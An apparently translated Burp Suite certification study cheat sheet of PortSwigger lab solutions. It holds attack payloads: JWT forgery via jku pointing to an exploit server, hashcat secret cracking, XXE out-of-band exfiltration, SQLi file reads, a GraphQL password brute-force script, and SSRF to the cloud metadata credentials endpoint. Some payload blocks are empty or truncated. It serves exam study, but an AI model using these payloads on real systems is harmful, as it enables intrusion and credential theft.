[通过 JWK 绕过 JWT](#manual-sqli) [JWT 弱密钥](#jwt-weak-secret) [JWT kid header](#jwt-kid-header) [JWT 任意 jku header](#jwt-arbitrary-jku-header) ### 通过 JWK 绕过 JWT 1. 新建 RSA 密钥 2. 在请求 JWT payload 中，将 **sub claim** 的值更改为 administrator 3. 选择 Attack，然后选择 **Embedded JWK** 使用新生成的 RSA 密钥 4. 观察到 ```jwk``` 参数现在包含我们的公钥，发送请求将导致访问管理门户  [PortSwigger 实验：通过 jwk header 注入绕过 JWT 身份验证](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection) ### JWT 弱密钥 ``` hashcat -a 0 -m 16500 /path/to/jwt.secrets.list ``` [PortSwigger 通过弱签名密钥绕过 JWT 身份验证](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key) ### JWT kid header ``` { "kid": "../../../../../../../dev/null", "alg": "HS256" } ``` ``` { "iss": "portswigger", "sub": "administrator", "exp": 1673523674 } ```  [PortSwigger 实验：通过 kid header 路径遍历绕过 JWT 身份验证](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal) ### JWT 任意 jku header 1. 自动生成 **新 RSA 密钥对**，并忽略大小。 2. 在利用服务器主体上创建 **空 JWK** ` { "keys": [ ] } `。 3. 从上一步生成的新 RSA 密钥对中 **复制公钥为 JWK**，粘贴到利用主体方括号 ` [ paste ] ` 之间。 4. 将生成的 RSA 密钥的 kid 值复制到 `/admin` 请求 JWT header `kid` 值中。 5. 将新 ```jku``` 参数设置为利用服务器 URL `https://exploit-server.net/exploit` 的值。 6. 将 JWT payload 中 ```sub``` claim 的值更改为 `administrator`。 7. 在 Repeater 中的 `/admin` 请求上，点击 JSON Web Token 选项卡底部的 `Sign`。 8. 在 Sign 选项上，选择前面步骤中生成的 `RSA signing key`。 9. 发送请求，并获得对管理门户的访问权限。  ``` { "keys": [ { "kty": "RSA", "e": "AQAB", "kid": "3c0171bd-a8cf-45b5-839f-645fa2a57009", "n": "749eJdyiwAYYVV F8tsQ_zu23DhdoePay3JlYXmza9DWDw" } ]} ```  [PortSwigger 实验：通过 jku header 注入绕过 JWT 身份验证](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection) ## 原型污染 [客户端原型](#client-side-proto) [服务端原型](#server-side-proto) [Dom Invader 启用原型污染](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution#enabling-prototype-pollution) ### 客户端原型 ``` ```  [PortSwigger 实验：第三方库中的客户端原型污染](https://portswigger.net/web-security/prototype-pollution/finding/lab-prototype-pollution-client-side-prototype-pollution-in-third-party-libraries)  ### 服务端原型 ``` "__proto__": { "foo":"bar" } ```  ``` "__proto__": { "isAdmin":true } ``` [PortSwigger 实验：通过服务端原型污染进行权限提升](https://portswigger.net/web-security/prototype-pollution/server-side/lab-privilege-escalation-via-server-side-prototype-pollution) ## API 测试 [利用批量赋值](#exploiting-a-mass-assignment) [API 重置密码参数污染](#api-reset-password-parameter-pollution) ### 利用批量赋值  ``` { "username": "carlos", "email": "carlos@exploit.com", "isAdminLevel": true } ``` [PortSwigger 实验：利用批量赋值漏洞](https://portswigger.net/web-security/api-testing/lab-exploiting-mass-assignment-vulnerability) ### API 重置密码参数污染 ``` username=administrator%26x=y ``` #### URL 编码字符表 * `%3F` - `?` * `%3E` - `>` * `%3D` - `=` * `%3C` - `<` * `%3B` - `;` * `%2C` - ',' * `%28` - `(` * `%29` - `)` * `%27` - `'` * `%26` - `&` 不同参数之间的[分隔符](https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/blob/main/wordlists/delimiters.txt) * `%25` - `%` * `%24` - `$` * `%23` - `#` 片段标识符 * `%22` - `"` * `%2F` - `/` * `%27` - 反引号   浏览目标 URL 并添加被盗的重置令牌，更改 `administrator` 或 `carlos` 用户密码以获得访问权限。 [PortSwigger 实验：利用查询字符串中的服务端参数污染](https://portswigger.net/web-security/api-testing/server-side-parameter-pollution/lab-exploiting-server-side-parameter-pollution-in-query-string) ## 访问控制 [JSON roleid 权限提升](#privesc-json-roleid) [原始 URL](#original-url) [丢弃 Select a role](#drop-select-a-role) [Trace 到 Admin](#trace-to-admin) [HTB 要求我删除关于 CPTS 技能评估的 write-up - IDOR](https://github.com/botesjuan/cpts-quick-references/blob/main/module/Web-Attacks.md#idor) ### 权限提升 JSON RoleId ``` POST /my-account/change-email HTTP/1.1 Host: TARGET.net Cookie: session=vXAA9EM1hzQuJwHftcLHKxyZKtSf2xCW Content-Length: 48 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Connection: close { "csrf":"u4e8f4kc84md743ka04lfos84", "email":"carlos@server.net", "roleid": 42 } ```   [PortSwigger 实验：可以在用户配置文件中修改用户角色](https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile) ### 丢弃 Select a role  [PortSwigger 实验：通过有缺陷的状态机绕过身份验证](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-authentication-bypass-via-flawed-state-machine) ### 原始 URL ``` X-Original-URL: /admin ```  [PortSwigger 实验：可以绕过基于 URL 的访问控制](https://portswigger.net/web-security/access-control/lab-url-based-access-control-can-be-circumvented) ### Trace 到 Admin  ``` GET /admin HTTP/2 Host: TARGET.net X-Custom-Ip-Authorization: 127.0.0.1 Cookie: session=2ybmTxFLPlisA6GZvcw22Mvc29jYVuJm ``` [PortSwigger 实验：通过信息泄露绕过身份验证](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass) ## GraphQL API [识别 GraphQL API](#identify-graphql-api) [GraphQL 揭示凭据](#graphql-reveal-creds) [GraphQL 暴力破解](#graphql-brute-force) [GraphQL Voyager 可视化攻击路径](#graphql-voyager) ### 识别 GraphQL API  ``` { "data": { "__typename": "query" } } ``` ``` /api?query=query+IntrospectionQuery+%7B%0D%0A++__schema+%7B%0D%0A++++queryType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++mutationType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++subscriptionType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++types+%7B%0D%0A++++++...FullType%0D%0A++++%7D%0D%0A++++directives+%7B%0D%0A++++++name%0D%0A++++++description%0D%0A++++++args+%7B%0D%0A++++++++...InputValue%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+FullType+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++description%0D%0A++fields%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++args+%7B%0D%0A++++++...InputValue%0D%0A++++%7D%0D%0A++++type+%7B%0D%0A++++++...TypeRef%0D%0A++++%7D%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++inputFields+%7B%0D%0A++++...InputValue%0D%0A++%7D%0D%0A++interfaces+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++enumValues%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++possibleTypes+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+InputValue+on+__InputValue+%7B%0D%0A++name%0D%0A++description%0D%0A++type+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++defaultValue%0D%0A%7D%0D%0A%0D%0Afragment+TypeRef+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++ofType+%7B%0D%0A++++kind%0D%0A++++name%0D%0A++++ofType+%7B%0D%0A++++++kind%0D%0A++++++name%0D%0A++++++ofType+%7B%0D%0A++++++++kind%0D%0A++++++++name%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A ```   [PortSwigger 实验：查找隐藏的 GraphQL 端点](https://portswigger.net/web-security/graphql/lab-graphql-find-the-endpoint) ### GraphQL 揭示凭据    [PortSwigger 实验：意外暴露私有 GraphQL 字段](https://portswigger.net/web-security/graphql/lab-graphql-accidental-field-exposure) ### GraphQL 暴力破解 ``` { "errors": [ { "path": [ "login" ], "extensions": { "message": "You have made too many incorrect login attempts. Please try again in 1 minute(s)." }, "locations": [ { "line": 3, "column": 9 } ], "message": "Exception while fetching data (/login) : You have made too many incorrect login attempts. Please try again in 1 minute(s)." } ], "data": { "login": null } } ``` ``` copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>` bruteforce$index:login(input:{password: "$password", username: "carlos"}) { token success } `.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard."); ```   [PortSwigger 实验：绕过 GraphQL 暴力破解保护](https://portswigger.net/web-security/graphql/lab-graphql-brute-force-protection-bypass) ### GraphQL Voyager ``` mkdir graphql-voyager-local cp ../introspection.json graphql-voyager-local/ sudo apt install nodejs npm npm install express graphql-voyager node server.js ```  ## CORS [信任不安全协议](#trusted-insecure-protocols) [信任 Null origin](#null-origin-trusted) ### 信任不安全协议  ``` Origin: http://subdomain.TARGET.NET ```  ``` ``` [PortSwigger 实验：具有信任不安全协议的 CORS 漏洞](https://portswigger.net/web-security/cors/lab-breaking-https-attack) ### 信任 Null origin ``` ```  [PortSwigger 实验：具有信任 null origin 的 CORS 漏洞](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) # 数据渗出 ## XXE 注入 [XXE 识别](#identify-xml) [XXE Xinclude 文件读取](#xinclude-file-read) [XXE DTD 盲注带外](#dtd-blind-out-of-band) [XXE DTD 盲注错误消息](#dtd-blind-error-messages) [XXE XML 内的 SQLi + HackVertor](#sql--xml--hackvertor) [XXE 执行 SSRF](#xxe--ssrf) [通过 SVG 上传的 XXE](#xxe-via-svg-image-upload) [HackTheBox XML 外部实体注入 - 私有 Github](https://github.com/botesjuan/cpts-quick-references/blob/main/module/Web-Attacks.md#xxe) ### 识别 XML ``` %26entity; ```  ### Xinclude 文件读取 ``` ```  ``` ``` [PortSwigger 实验：利用 XInclude 检索文件](https://portswigger.net/web-security/xxe/lab-xinclude-attack) ### DTD 盲注带外 ``` "> %eval; %exfil; ```  ``` %xxe;]> Carl Toyota carlos@hacked.net ```  [PortSwigger 实验：利用盲注 XXE 使用恶意外部 DTD 渗出数据](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration) ### 识别现有 DTD 文件 以下 POST 主体中的 XML payload 可用于识别目标服务器上现有的 DTD 文件： ``` %peanuts; ]> 1 1 ```  ### DTD 盲注错误消息 ``` "> %eval; %exfil; ``` ``` %xxe;]> 1 1 ```  [PortSwigger 实验：利用盲注 XXE 通过错误消息检索数据](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages) ### SQL + XML + HackVertor  ``` 1 UNION SELECT NULL ```  ``` <@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities> ```  ``` <@hex_entities>1 UNION all select load_file('/home/carlos/secret')<@/hex_entities> <@hex_entities>1 UNION all select load_file('/home/carlos/secret') into outfile '/tmp/secret'<@/hex_entities> ``` [PortSwigger 实验：通过 XML 编码绕过过滤器的 SQL 注入](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding) ## SSRF - 服务端请求伪造 [SSRF 黑名单过滤器](#ssrf-blacklist-filter) [通过绝对 GET URL + HOST Header 的 SSRF](#absolute-get-url--host-ssrf) [XXE 内的 SSRF](#xxe--ssrf) [基于 HOST 路由的 SSRF](#host-routing-based-ssrf) [HTML-to-PDF 内的 SSRF](#html-to-pdf) [SSRF 开放重定向](#ssrf-open-redirection) [SSRF 连续连接状态](#host-connection-state) ``` /product/nextProduct?currentProductId=6&path=https://EXPLOIT.net stockApi=http://localhost:6566/admin http://127.1:6566/admin Host: localhost ``` 1. 2130706433 2. 017700000001 3. 127.1 ### SSRF 黑名单过滤器  [PortSwigger 实验：具有基于黑名单的输入过滤器的 SSRF](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter) ### 绝对 GET URL + HOST SSRF ``` GET https://TARGET.net/ Host: OASTIFY.COM ```   ``` GET https://TARGET.net/admin/delete?csrf=cnHBVbOPl7Bptu3VCXQZh6MUYzMsEXgO&username=carlos HTTP/1.1 Host: 192.168.0.114 Cookie: session=PQcb5CMC9ECh5fBobuxSalaBdxyLis01 ``` [PortSwigger 实验：通过有缺陷的请求解析进行 SSRF](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-ssrf-via-flawed-request-parsing) ### SSRF redirect_uris ``` POST /reg HTTP/1.1 Host: oauth-TARGET.web-security-academy.net Content-Type: application/json Content-Length: 206 { "redirect_uris":["https://example.com"], "logo_uri" : "https://OASTIFY.COM", "logo_uri" : "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/" } ```  [PortSwigger 实验：通过 OpenID 动态客户端注册进行 SSRF](https://portswigger.net/web-security/oauth/openid/lab-oauth-ssrf-via-openid-dynamic-client-registration) ### XXE + SSRF ``` ]> &xxe; 1 ```  [PortSwigger 实验：利用 XXE 执行 SSRF 攻击](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf) ### 基于 HOST 路由的 SSRF ``` GET / HTTP/1.1 Host: 192.168.0.§0§ ```  ``` POST /admin/delete HTTP/1.1 Host: 192.168.0.135 Cookie: session=TmaxWQzsf7jfkn5KyT9V6GmeIV1lV75E Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: https://TARGET.web-security-academy.net/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 53 csrf=ftU8wSm4rqdQ2iuSZUwSGmDnLidhYjUg&username=carlos ``` [PortSwigger 实验：基于路由的 SSRF](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-routing-based-ssrf) ### HTML 转 PDF ``` function downloadReport(event, path, param) { body: JSON.stringify({ [param]: html } ) ``` ```

Report Heading by

``` ``` ``` [PortSwigger 研究 SSRF](https://portswigger.net/daily-swig/ssrf)  ``` ``` ``` { "tableHtml":"

SSRF in HTMLtoPDF